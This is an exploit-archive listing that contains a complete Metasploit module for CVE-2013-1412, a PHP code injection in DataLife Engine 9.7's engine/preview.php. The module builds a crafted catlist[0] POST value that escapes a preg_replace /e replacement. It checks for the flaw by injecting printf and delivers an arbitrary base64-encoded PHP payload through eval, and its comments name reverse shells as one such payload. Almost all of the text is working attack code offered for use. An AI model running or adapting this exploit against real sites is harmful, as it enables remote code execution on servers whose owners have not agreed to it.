
DataLife Engine preview.php PHP Code Injection

Author
metasploit
Risk
[
Security Risk High
]
0day-ID
0day-ID-20273
Category
remote exploits
Date add
01-02-2013
CVE
CVE-2013-1412
Platform
php
require 'msf/core'
 
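# Remote PHP code injection in DataLife Engine 9.7 (engine/preview.php).
#
# The script passes attacker-controlled POST data (catlist[0]) through
# preg_replace() with the /e modifier, so the replacement string is evaluated
# as PHP. The module closes the string the replacement is built from and
# appends its own PHP statement.
#
# NOTE(review): the /e modifier was removed in PHP 7.0, so a target running
# PHP >= 7 should not be exploitable this way regardless of the DLE version --
# confirm against the target's PHP version before relying on +check+.
class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking

    include Msf::Exploit::Remote::HttpClient

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'DataLife Engine preview.php PHP Code Injection',
            'Description'    => %q{
                    This module exploits a PHP code injection vulnerability DataLife Engine 9.7.
                The vulnerability exists in preview.php, due to an insecure usage of preg_replace()
                with the e modifier, which allows to inject arbitrary php code, when the template
                in use contains a [catlist] or [not-catlist] tag.
            },
            'Author'         =>
                [
                    'EgiX', # Vulnerability discovery
                    'juan vazquez' # Metasploit module
                ],
            'License'        => MSF_LICENSE,
            'References'     =>
                [
                    [ 'CVE', '2013-1412' ],
                    [ 'BID', '57603' ],
                    [ 'EDB', '24438' ],
                    [ 'URL', 'http://karmainsecurity.com/KIS-2013-01' ],
                    [ 'URL', 'http://dleviet.com/dle/bug-fix/3281-security-patches-for-dle-97.html' ]
                ],
            'Privileged'     => false,
            'Platform'       => ['php'],
            'Arch'           => ARCH_PHP,
            'Payload'        =>
                {
                    'Keys'   => ['php']
                },
            'DisclosureDate' => 'Jan 28 2013',
            'Targets'        => [ ['DataLife Engine 9.7', { }], ],
            'DefaultTarget'  => 0
            ))

        register_options(
            [
                OptString.new('TARGETURI', [ true, "The base path to the web application", "/"])
            ], self.class)
    end

    # Path of the vulnerable script: <TARGETURI>/engine/preview.php
    def uri
        normalize_uri(target_uri.path, 'engine', 'preview.php')
    end

    # Builds the catlist[0] value: a random prefix, then `')` to terminate the
    # string literal inside the /e replacement, `||` to chain our statement,
    # and `//` to comment out whatever the original replacement appends.
    #
    # @param php_code [String] a single PHP expression to evaluate
    # @return [String] the injected parameter value
    def injection(php_code)
        "#{rand_text_alpha(4 + rand(4))}')||#{php_code};//"
    end

    # POSTs the injection to preview.php and returns the response, or nil
    # when no response was received (timeout / connection failure).
    #
    # @param php_code [String] PHP expression passed to +injection+
    # @return [Rex::Proto::Http::Response, nil]
    def send_injection(php_code)
        send_request_cgi(
            'uri'       => uri,
            'method'    => 'POST',
            'vars_post' => { 'catlist[0]' => injection(php_code) }
        )
    end

    # Vulnerability check: inject a printf() of a random marker and look for
    # the marker in the response body.
    #
    # A missing response is reported as Unknown rather than Safe: a timeout or
    # refused connection says nothing about the application.
    def check
        fingerprint = rand_text_alpha(4 + rand(4))
        res = send_injection("printf(\"#{fingerprint}\")")

        return Exploit::CheckCode::Unknown if res.nil?

        if res.code == 200 && res.body.include?(fingerprint)
            Exploit::CheckCode::Vulnerable
        else
            Exploit::CheckCode::Safe
        end
    end

    # Delivers the PHP payload via eval(base64_decode(...)). Base64 keeps the
    # payload free of quotes and newlines that would break out of the injected
    # string. The HTTP response is deliberately not inspected: a blocking
    # payload (e.g. a reverse shell) holds the request open, so a timeout here
    # is normal and not a failure.
    def exploit
        @peer = "#{rhost}:#{rport}"
        encoded_payload = Rex::Text.encode_base64(payload.encoded)

        print_status("#{@peer} - Exploiting the preg_replace() to execute PHP code")
        send_injection("eval(base64_decode(\"#{encoded_payload}\"))")
    end
end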
